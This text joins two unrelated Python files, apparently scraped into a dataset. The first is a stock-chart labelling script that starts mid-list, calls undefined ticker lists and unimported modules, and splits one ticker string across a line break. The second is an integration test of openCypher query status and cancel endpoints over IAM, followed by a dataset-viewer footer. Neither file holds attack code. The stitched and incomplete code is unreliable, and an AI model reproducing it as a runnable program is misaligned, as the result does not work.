tickers3 = ["EVR","RE","EVRG","EVRI","ES","EVTC","EVH","AQUA","XAN","XAN","EXPR","EXTN","EXR","XOM","FNB","FNB","FN","FDS","FICO","SFUN","FPAC","FPAC.U","FPAC.W","FTCH","FPI","FPI","FSLY","FBK","FFG","AGM","AGM.A","AGM","AGM","AGM","FRT","FRT","FSS","FHI","FMN","FDX","RACE","FOE","FG","FG.WS","FCAU","FNF","FIS","FMO","FINV","FAF","FBP","FCF","FHN","FHN","FR","AG","FRC","FRC","FRC","FRC","FRC","FRC","FFA","FMY","FDEU","FIF","FSD","FPF","FEI","FPL","FIV","FCT","FGB","FEO","FAM","FE","FIT","FPH","FVRR","FBC","DFP","PFD","PFO","FFC","FLC","FLT","FLNG","FND","FTK","FLO","FLS","FLR","FLY","FEAC.U","FMC","FMX","FL","F","F","F","FOR","FTS","FTV","FTV","FTAI","FTAI","FTAI","FSM","FBHS","FET","FBM","FCPT","FEDU","FNV","FC","FSB","BEN","FT","FI","FCX","FMS","FDP","RESI","FRO","FSK","FCN","FTSI","FF","GCV","GAB","GAB","GAB","GAB","GAB","GGZ","GGZ","GGT","GGT","GGT","GUT","GUT","GUT","GCAP","GLEO","GLEO.U","GLEO.W","GBL","GNT","GNT","GME","GCI","GPS","GTX","IT","GLOG","GLOG","GLOP","GLOP","GLOP","GLOP","GTES","GATX","GMTA","GCP","GNK","GNRC","GAM","GAM","GD","GE","GIS","GM","GCO","GEL","GEN","GNE","GNE","G","GPC","GNW","GEO","GPRK","GPJA","GGB","GTY","GFL","GFLU","GIX","GIX.U","GIX.WS","GIX~","GIL","GLT","GKOS","GSK","CO","GMRE","GMRE","GNL","GNL","GNL","GLP","GLP","GPN","GSL","GSL","GSLD","GLOB","GL","GL","GMED","GMS","GNC","GDDY","GOL","GFI","GSBD","GS","GS","GS","GS","GS","GS","GS","GER","GMZ","GRC","GPX","GGG","GRAF","GRAF.U","GRAF.W","EAF","GHM","GHC","GRAM","GVA","GPMT","GRP.U","GPK","GTN","GTN.A","AJX","AJXA","GWB","GDOT","GBX","GHL","GHG","GEF","GEF.B","GFF","GPI","GRUB","PAC","ASR","AVAL","SUPV","TV","GSX","GTT","GSH","GES","GGM","GPM","GOF","GBAB","GWRE","HRB","FUL","HAE","HAL","HBB","HBI","HNGR","HASI","HOG","HMY","HSC","HHS","HGH","HIG","HIG","HVT","HVT.A","HE","HCHC","HCA","HCI","HDB","HR","HTA","PEAK","HL","HL","HEI","HEI.A","HLX","HP","HLF","HRI","HCXY","HCXZ","HTGC","HRTG","PSV","HT","HT","HT","HT","HSY","HTZ","HES","HESM","HPE","HXL","HEXO","HCR","PCF","HGLB","H
FRO","HFRO","HPR","HIW","HIL","HI","HRC","HTH","HGV","HLT","HNI","HMLP","HMLP","HEP","HFC","HD","HMC","HON","HMN","HZN","HTFA","HRL","HST","HLI","HOV","HHC","HWM","HPQ","HSBC","HSBC","HMI","HNP","HUBB","HUBS","HBM","HUD","HPP","HUM","HCFT","HII","HUN","HUYA","H","HY","IAA","IAG","IBN","IDA","IEX","IDT","INFO","ITW","IMAX","ICD","IHC","IRT","IFN","IBA","INFY","ING","IR","NGVT","INGR","IIPR","IIPR","IPHI","INSI","NSP","INSP","IBP","ITGR","I","ICE","IHG","IFS","IBM","IFF","IFFT","IGT","IP","INSW","INSW","IPV","IPV.U","IPV.WS","IPG","IPI","IVC","VBF","VCV","VTA","IHIT","IHTA","VLT","IVR","IVR","IVR","IVR","OIA","VMO","VKQ","VPV","IVZ","IQI","VVR","VTN","VGM","IIM","IRET","IRET","NVTA","INVH","IO","IQV","IRM","IRS","ICL","STAR","STAR","STAR","STAR","ITCB","ITUB","ITT","IVH","JPM","JPM","JPM","JPM","JPM","JPM","JAX","JILL","JCP","SJM","JBL","J","JHX","JHG","JOF","JBGS","JEF","JELD","JCAP","JCAP","JT","JKS","JMP","JBT","BTO","HEQ","JHS","JHI","HPF","HPI","HPS","PDT","HTD","HTY","JW.A","JW.B","JNJ","JCI","JLL","JMIA","JIH","JIH.U","JIH.WS","JNPR","JP","JE","JE","LRN","KAI","KDMN","KAMN","KSU","KSUKAR","KMF","KYN","KB","KBH","KBR","K","KEM","KMPR"]
tickers4 = ["KMT","KW","KEN","KDP","KEY","KEY","KEY","KEY","KEYS","KRC","KRP","KMB","KIM","KIM","KIM","KMI","KFS","KGC","KEX","KL","KRG","KKR","KKR","KKR","KIO","KREF","KNX","KNL","KNOP","KN","KSS","PHG","KTB","KOP","KEP","KF","KFY","KOS","KRA","KR","KRO","KT","LB","SCX","LHX","LH","LADR","LAIX","LW","LCI","LPI","LVS","LTM","LGI","LAZ","LZB","LCII","LEAF","LEA","LEE","LGC","LGC.U","LGC.WS","LM","LMHA","LMHB","LEG","JBK","KTH","KTN","KTP","LDOS","LEJU","LC","LEN","LEN.B","LII","LHC","LHC.U","LHC.WS","LEVI","LXP","LXP","LPL","DFNS","DFNS.U","DFNS.W","USA","ASG","LBRT","LSI","LITB","LNC","LIN","LNN","LN","LINX","LGF.A","LGF.B","LAD","LAC","LYV","LTHM","RAMP","LYG","SCD","LMT","L","LOMA","LPX","LOW","LXU","LTC","LUB","LL","LXFR","LDL","LYB","MTB","MDC","MHO","MAC","CLI","MFD","MGU","MIC","BMA","M","MCN","MSGE$","MSGS$","MMP","MGA","MX","MGY","MH","MH","MH","MHLA","MHNC","MAIN","MMD","MNK","MANU","MTW","MN","MAN","MFC","MRO","MPC","MMI","MCS","MPX","HZO","MKL","VAC","MMC","MLM","MAS","DOOR","MTZ","MA","MTDR","MTRN","MATX","MLP","MAXR","MMS","MXL","MEC","MBI","MKC","MKC.V","MCD","MUX","MCK","MDU","MTL","MTLMDL","MPW","MED","MCC","MCV","MCX","MDLQ","MDLX","MDLY","MD","MDT","MFAC","MFAC.U","MFAC.W","MRK","MCY","MDP","MTH","MTOR","MER","PIY","MTR","MSB","MEI","MET","MET","MET","MET","MCB","MTD","MXE","MXF","MFA","MFA","MFA","MFO","MCR","MGF","MIN","MMT","MFM","MFV","MTG","MGP","MGM","MFGP","MAA","MAA","AMPY","MLR","HIE","MTX","MG","MUFG","MIXT","MFG","MBT","MODN","MOD","MC","MOGU","MHK","MOH","TAP","TAP.A","MNR","MNR","MR","MCO","MOG.A","MOG.B","MS","MS","MS","MS","MS","MS","MS","CAF","MSD","EDD","IIF","MOS","MSI","MOV","MPLX","MRC","HJV","MSA","MSM","MSCI","MSGN","MLI","MWA","MVF","MZA","MUR","MUSA","MVO","MVC","MVCD","MYE","MYOV","NBR","NBR","NC","NTP","NTEST","NTEST.","NTEST.","NTEST.","NBHC","NFG","NGG","NHI","NOV","NPK","NNN","NNN","NRUC","SID","NSA","NSA","NTCO","NGS","NGVC","NRP","NTZ","NLS","NVGS","NNA","NM","NM","NM","NMM","NAV","NAV","NCR","NP","NNI","NPTN","NSCO",
"NSCO.W","NVRO","HYB","NFH","NFH.WS","GF","NWHM","IRL","NMFC","NMFX","EDU","NEWR","NRZ","NRZ","NRZ","NRZ","SNR","NYCB","NYCB","NYCB","NYT","NJR","NEU","NEM","NR","NEXA","NREF","NXRT","NHF","NEP","NEE","NEE","NEE","NEE","NEE","NEE","NEE","NEX","NGL","NGL","NGL","NMK","NMK","NLSN","NKE","NINE","NIO","NI","NI","NL","NOAH","NE","NOK","NOMD","NMR","OSB","NAT","JWN","NSC","NOA","NRT","NOC","NWN","NWE","NCLH","NVS","NVO","DNOW","NRG","NUS","NUE","NS","NS","NS","NS","NSS","NTR","JMLP","NVG","NUV","NUW","NEA","NAZ","NKX","NCB","NCA","NAC","JCE","JCO","JQC","JDD","DIAX","JEMD","JMF","NEV","JFR","JRO","NKG","JGH","JHY","JHAA","JHB","NXC","NXN","NID","NMY","NMT","NUM","NMS","NOM","JLS","JMM","NHA","NZF","NMCO","NMZ","NMI","NJV","NXJ","NRK","NYV","NNY","NAN","NUO","NPN","NQP","JPC","JPS","JPT","JPI","NAD","JRI","JRS","BXMX","SPXX","NIM","NXP","NXQ","NXR","NSL","JSD","NBB","JTD","JTA","NPV","NIQ","NVT","NVR","CTEST","CTEST.","CTEST.","CTEST.","CTEST.","CTEST.","CTEST.","OAC","OAC.U","OAC.WS","OAK","OAK","OXY","OII","OCN","OFG","OFG","OFG","OFG","OGE","OI","OIBR.C","OIS","ODC","ORI","OLN","OHI","OMC","ONDK","OGS","OLP","OCFT","OMF","OKE","ONE","ONTO","OOMA"]
tickers5 = ["OPY","ORCL","ORAN","ORC","OEC","ORN","IX","ORA","OSK","OR","SFTW","SFTW.U","SFTW.W","OTIS","OUT","OSG","OVV","OMI","OC","ORCC","OXM","ROYT","PACD","PCG","PKG","PD","PAGS","PANW","PAM","PHX","PARR","PAR","PGRE","PKE","PK","PH","PE","PSN","PRE","PRE","PRE","PRE","PRTY","PAYC","PBF","PBFX","BTU","PSO","PEB","PEB","PEB","PEB","PEB","PBA","PEI","PEI","PEI","PEI","PFSI","PMT","PMT","PMT","PAG","PNR","PEN","PFGC","PKI","PBT","PVL","PRT","PRGO","PRSP","PTR","PBR","PBR.A","PFE","GHY","ISD","PGTI","PM","PSX","PSXP","FENG","DNK","PHR","DOC","PDM","PCQ","PCK","PZC","PCM","PTY","PCN","PCI","PDI","NRGX","PGP","PHK","PKO","PFL","PFN","PMF","PML","PMX","PNF","PNI","PYN","RCS","PING","PNW","PINS","PHD","PHT","MAV","MHI","PXD","PIPR","PBI","PBI","PIC","PIC.U","PIC.WS","PJT","PAA","PAGP","PLNT","PLT","AGS","PHI","PLYM","PNC","PNC","PNC","PNM","PII","POL","POR","PKX","POST","PSTL","PPG","PPX","PPL","PYS","PYT","PQG","PDS","APTS","PBH","PVG","PRI","PRMW","PGZ","PRIF","PRIF","PRIF","PRIF","PRIF","PRIF","PRA","PG","PGR","PLD","PUMP","PRO","PROS","PBB","PBC","PBY","PB","PRLB","PFS","PJH","PRH","PRS","PRU","PUK","PUKPUK","PSB","PSB","PSB","PSB","PSB","TLK","PEG","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PSA","PHM","PSTG","PMM","PIM","PMO","PPT","NEW","PVH","PYX","PZN","QTWO","QEP","QGEN","QTS","QTS","QTS","QUAD","KWR","NX","PWR","QD","DGX","QES","QUOT","QVCC","QVCD","CTAA","CTBB","CTDD","CTV","CTY","CTZ","RRD","RMED","RDN","RFL","RL","RRC","RNGR","PACK","PACK.W","RJF","RYAM","RYN","RTX","RMAX","RC","RCA","RCB","RCP","RLGY","O","RLH","RWT","RBC","RM","RF","RF","RF","RF","RGS","RGA","RZA","RZB","RS","RELX","RNR","RNR","RNR","SOL","RENN","RPLA","RPLA.U","RPLA.W","RSG","REZI","RMD","RFP","QSR","RPAI","RVI","REVG","REV","RVLV","REX","REXR","REXR","REXR","REXR","RXN","RH","RNG","RIO","RBA","RAD","RFM","RMM","RMI","RIV","RMPLRS","OPP","RLI","RLJ","RLJ","RMG","RMG.U","RMG.WS","RRTS","RHI","ROK","RCI","ROG","ROL","ROP","RST","RY","RY","RBS","RCL","RD
S.A","RDS.B","RGT","RMT","RVT","RES","RPM","RPT","RPT","RTW","RYB","R","RYI","RHP","SPGI","SBR","SB","SB","SB","SFE","SAFE","SAIL","CRM","SMM","SBH","SJT","SD","PER","SAND","SC","SAP","SAF","SAR","SSL","BFS","BFS","BFS","SCPE","SCPE.U","SCPE.W","SLB","SNDR","SWM","SAIC","SALT","SBNA","STNG","SMG","KTF","KSM","SRL","SCU","SCVX","SCVX.U","SCVX.W","SE","SA","CKH","SMHI","SDRL","SEE","SEAS","JBN","JBR","WTTR","SEM","SRE","SRE","SRE","SREA","ST","SXT","SQNS","SRG","SRG","SCI","SERV","NOW","SFL","SHAK","SJR","SHLX","SHW","SHG","SHOP","SSTK","SBSW","SIG","SBOW","SI","SPG","SPG","SSD","SHI","SITC","SITC","SITC","SITE","SIX","SJW","SKM","SKX","SKY","SLG","SLG","WORK","SM","SMAR","SNN","SNAP","SNA","SQM","SOGO","SOI","SWI","SAH","SON","SNE","SOR","SJI","SJIJ","SJIU","SCE","SCE","SCE","SCE","SCE","SO","SOJA","SOJB","SOJC","SOJD","SOLN","SCCO","LUV","SWX","SWN","SPAQ","SPAQ.U","SPAQ.W","SPE","SPE","SPB","SR","SR","SPR","SAVE","SRC","SRC","SPOT","SRLP","SPXC","FLOW","SQ","JOE","STAG","STAG","SSI","SMP","SXI","SWK"]
# Chart-labelling thresholds (a window counts as a 2% gain or 2% loss).
GAIN = 1.02
LOSS = 0.98
# Number of samples averaged when comparing window endpoints.
AVERAGE_TOTAL = 1
# Minutes covered by one chart window.
INTERVAL = 60
# Number of sub-steps per interval (step size = INTERVAL // RESOLUTION).
RESOLUTION = 12

# Sanity-check the configuration up front: the averaging span must stay
# strictly below half a step.  The original raised NameError (wrong
# exception type for a bad value) with a message that contradicted the
# condition ("cannot be less than half" while raising when >= half).
if AVERAGE_TOTAL >= (INTERVAL // RESOLUTION) // 2:
    raise ValueError("AVERAGE_TOTAL must be less than half of INTERVAL // RESOLUTION.")
def stockGrabber(tickers):
    """Download one day of 1-minute bars per ticker and save labelled charts.

    For each ticker, fetches the 2020-05-05 intraday data from yfinance,
    then for each hour (11-23) slides a window of INTERVAL // RESOLUTION
    minutes across the hour, plots the "Open" series, and saves the figure
    under a "rise.*" or "fall.*" name depending on whether the price one
    step beyond the window end exceeds the price at the window end.

    :param tickers: iterable of ticker symbols understood by yfinance.
    """
    # Local import: the module-level name `datetime` is shadowed by the
    # class import (`from datetime import datetime`), so timedelta must be
    # brought in explicitly.
    from datetime import timedelta

    step = INTERVAL // RESOLUTION
    for ticker in tickers:
        for year in range(2020, 2021):
            for month in range(5, 6):
                for day in range(5, 6):
                    day_start = datetime(year, month, day)
                    # timedelta avoids the month-end overflow the original
                    # hit by formatting str(day + 1) into strptime.
                    data = yf.download(ticker,
                                       start=day_start,
                                       end=day_start + timedelta(days=1),
                                       interval="1m")
                    for hour in range(11, 24):
                        try:
                            # Skip weekends (weekday 5/6).  The original
                            # built this exception without raising it and
                            # had the comparison inverted (< 5 flags
                            # weekdays), so the check never worked.
                            if datetime(year, month, day).weekday() >= 5:
                                raise FileNotFoundError("Wrong Day of the Week")
                            fig = plt.Figure()
                            ax = fig.add_subplot()
                            minute = 0
                            while minute <= INTERVAL:
                                start = pd.to_datetime(datetime(year, month, day, hour, minute))
                                # timedelta arithmetic rolls over hour
                                # boundaries correctly; the original's
                                # minute arithmetic raised ValueError past
                                # minute 59 (swallowed by its bare except).
                                finish = start + timedelta(minutes=step)
                                old_end_mean = data.loc[finish][0] / AVERAGE_TOTAL
                                new_end_mean = data.loc[start + timedelta(minutes=2 * step)][0] / AVERAGE_TOTAL
                                ref = data.loc[start][0]
                                ax.set_ylim(ref * .95, ref * 1.05)
                                lines = ax.plot(data.loc[start:finish, "Open"])
                                label = "rise" if new_end_mean > old_end_mean else "fall"
                                fig.savefig(label + "." + str(day) + "-" + str(hour) + " - " + str(minute)
                                            + " - " + ticker + ".png", bbox_inches='tight')
                                minute += step
                                # ax.plot returns a list of Line2D artists;
                                # list.remove() needs an argument, so the
                                # original call raised TypeError (hidden by
                                # the bare except).  Detach each line so the
                                # next window starts from a clean axes.
                                for line in lines:
                                    line.remove()
                        except Exception:
                            # Best-effort: missing bars, closed-market days
                            # and out-of-range timestamps just skip the hour.
                            print("missing or incorrect data - ")
                            print("Day: " + str(day) + " Hour: " + str(hour) + " failed")
if __name__ == "__main__":
    # One worker process per ticker batch.
    ticker_batches = [tickers0, tickers1, tickers2, tickers3, tickers4, tickers5]
    workers = [multiprocessing.Process(target=stockGrabber, args=(batch,))
               for batch in ticker_batches]
    for worker in workers:
        worker.start()
    # Join every worker: the original joined only P1-P4, so the parent
    # could finish while P0 and P5 were still downloading.
    for worker in workers:
        worker.join()
test_opencypher_status_with_iam.py | """
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
"""
import threading
import logging
import time
import pytest
import requests
from botocore.session import get_session
from test.integration.DataDrivenOpenCypherTest import DataDrivenOpenCypherTest
# Module logger.  The original tag said "WithoutIam", contradicting this
# IAM-enabled module's filename and class name — a copy-paste slip.
logger = logging.getLogger('TestOpenCypherStatusWithIam')
class TestOpenCypherStatusWithIam(DataDrivenOpenCypherTest):
    """Integration tests for openCypher status/cancel endpoints over IAM auth.

    Long-running queries are launched on a worker thread so the main
    thread can query their status and cancel them mid-flight.
    """

    def do_opencypher_query_save_result(self, query, res):
        # Worker-thread target: runs the query over HTTP and stores either
        # the JSON result or the JSON error payload into the shared dict
        # `res` for the main thread to inspect after join().
        try:
            result = self.client.opencypher_http(query)
            result.raise_for_status()
            res['result'] = result.json()
        except requests.HTTPError as exception:
            res['error'] = exception.response.json()

    def setUp(self) -> None:
        """Build an IAM-authenticated client and cancel any leftover queries."""
        super().setUp()
        self.client = self.client_builder.with_iam(get_session()).build()
        # Cancel anything still running from earlier tests so the query
        # counts asserted below start from a clean slate.
        status_res = self.client.opencypher_status()
        assert status_res.status_code == 200
        res = status_res.json()
        for q in res['queries']:
            self.client.opencypher_cancel(q['queryId'])

    def test_do_opencypher_status_nonexistent(self):
        """Status of an unknown query id is rejected with InvalidParameterException."""
        query_id = "ac7d5a03-00cf-4280-b464-edbcbf51ffce"
        status_res = self.client.opencypher_status(query_id)
        assert status_res.status_code != 200
        err = status_res.json()
        self.assertEqual(err['code'], "InvalidParameterException")
        expected_message = f'Supplied queryId {query_id} is invalid'
        self.assertEqual(err['detailedMessage'], expected_message)

    def test_do_opencypher_cancel_nonexistent(self):
        """Cancelling an unknown query id is rejected with InvalidParameterException."""
        query_id = "ac7d5a03-00cf-4280-b464-edbcbf51ffce"
        cancel_res = self.client.opencypher_cancel(query_id)
        assert cancel_res.status_code != 200
        err = cancel_res.json()
        self.assertEqual(err['code'], "InvalidParameterException")
        expected_message = f'Supplied queryId {query_id} is invalid'
        self.assertEqual(err['detailedMessage'], expected_message)

    def test_do_opencypher_cancel_empty_query_id(self):
        """The client rejects an empty query id before any request is made."""
        with pytest.raises(ValueError) as err:
            self.client.opencypher_cancel('')
        assert err.type is ValueError

    def test_do_opencypher_cancel_non_str_query_id(self):
        """The client rejects a non-string query id before any request is made."""
        with pytest.raises(ValueError) as err:
            self.client.opencypher_cancel(42)
        assert err.type is ValueError

    def test_do_opencypher_status_and_cancel(self):
        """A running query shows up in status and can be cancelled (non-silent).

        The cancelled query is expected to surface CancelledByUserException
        to the thread that submitted it.
        """
        # Deliberately expensive cross-product query so it is still running
        # after the one-second sleep below.
        query = '''MATCH(a)-->(b)
        MATCH(c)-->(d)
        MATCH(e)-->(f)
        RETURN a,b,c,d,e,f
        ORDER BY a'''
        query_res = {}
        oc_query_thread = threading.Thread(target=self.do_opencypher_query_save_result, args=(query, query_res,))
        oc_query_thread.start()
        # Give the server time to accept the query before polling status.
        time.sleep(1)
        status = self.client.opencypher_status()
        status_res = status.json()
        assert type(status_res) is dict
        assert 'acceptedQueryCount' in status_res
        assert 'runningQueryCount' in status_res
        assert status_res['runningQueryCount'] >= 1
        assert 'queries' in status_res
        # Find our query's id by matching the query text in the status list.
        query_id = ''
        for q in status_res['queries']:
            if query in q['queryString']:
                query_id = q['queryId']
        assert query_id != ''
        cancel = self.client.opencypher_cancel(query_id)
        assert cancel.status_code == 200
        cancel_res = cancel.json()
        assert type(cancel_res) is dict
        assert cancel_res['status'] == '200 OK'
        oc_query_thread.join()
        # Non-silent cancel: the submitting thread receives an error payload,
        # not a result.
        assert 'result' not in query_res
        assert 'error' in query_res
        assert 'code' in query_res['error']
        assert 'requestId' in query_res['error']
        assert 'detailedMessage' in query_res['error']
        assert 'CancelledByUserException' == query_res['error']['code']

    def test_do_sparql_status_and_cancel_silently(self):
        """Silent cancel: the submitting thread still receives an (empty) result.

        NOTE(review): the name says "sparql" but the body exercises
        openCypher — presumably copied from the SPARQL suite; confirm
        before renaming, since test runners discover it by name.
        """
        query = '''MATCH(a)-->(b)
        MATCH(c)-->(d)
        MATCH(e)-->(f)
        RETURN a,b,c,d,e,f
        ORDER BY a'''
        query_res = {}
        oc_query_thread = threading.Thread(target=self.do_opencypher_query_save_result, args=(query, query_res,))
        oc_query_thread.start()
        time.sleep(1)
        query_id = ''
        # Status is requested with an empty query id here (unlike the
        # no-argument call above) — presumably equivalent to asking for
        # overall status; confirm the client's handling of ''.
        status = self.client.opencypher_status(query_id)
        assert status.status_code == 200
        status_res = status.json()
        assert type(status_res) is dict
        assert 'acceptedQueryCount' in status_res
        assert 'runningQueryCount' in status_res
        assert 1 == status_res['runningQueryCount']
        assert 'queries' in status_res
        query_id = ''
        for q in status_res['queries']:
            if query in q['queryString']:
                query_id = q['queryId']
        assert query_id != ''
        # Redundant with the assert immediately above; kept as-is.
        self.assertNotEqual(query_id, '')
        cancel = self.client.opencypher_cancel(query_id, silent=True)
        cancel_res = cancel.json()
        assert type(cancel_res) is dict
        assert cancel_res['status'] == '200 OK'
        oc_query_thread.join()
        # The test expects a silently-cancelled query to complete with a
        # result payload whose bindings are empty (no error entry).
        assert type(query_res['result']) is dict
        assert 'a' in query_res['result']['head']['vars']
        assert 'b' in query_res['result']['head']['vars']
        assert 'c' in query_res['result']['head']['vars']
        # NOTE(review): only a-d are checked; e and f are omitted — confirm
        # whether that is intentional.
        assert 'd' in query_res['result']['head']['vars']
        assert [] == query_res['result']['results']['bindings']
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.